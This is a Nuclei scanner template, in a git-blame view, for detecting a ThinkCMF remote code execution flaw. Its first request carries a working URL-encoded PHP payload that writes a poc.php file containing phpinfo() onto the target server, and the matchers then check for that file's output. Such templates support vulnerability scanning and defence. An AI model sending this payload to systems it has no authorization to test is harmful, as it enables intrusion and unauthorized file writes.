2021-02-11 17:49:03 +00:00
|
|
|
id: thinkcmf-rce
|
2021-02-11 17:31:25 +00:00
|
|
|
|
|
|
|
info:
|
2021-02-11 17:49:03 +00:00
|
|
|
name: ThinkCMF RCE
|
2021-02-11 17:31:25 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
|
|
|
reference: https://www.freebuf.com/vuls/217586.html
|
2021-02-12 05:53:01 +00:00
|
|
|
tags: thinkcmf,rce
|
2021-02-11 17:31:25 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-02-11 20:33:38 +00:00
|
|
|
- "{{BaseURL}}/index.php?a=fetch&content=%3C?php+file_put_contents(%22poc.php%22,%22%3C?php+echo+phpinfo()%3B%22)%3B"
|
2021-02-11 17:31:25 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/poc.php"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-02-11 20:33:38 +00:00
|
|
|
- "PHP Extension"
|
|
|
|
- "PHP Version"
|
|
|
|
condition: and
|
2021-02-11 17:31:25 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|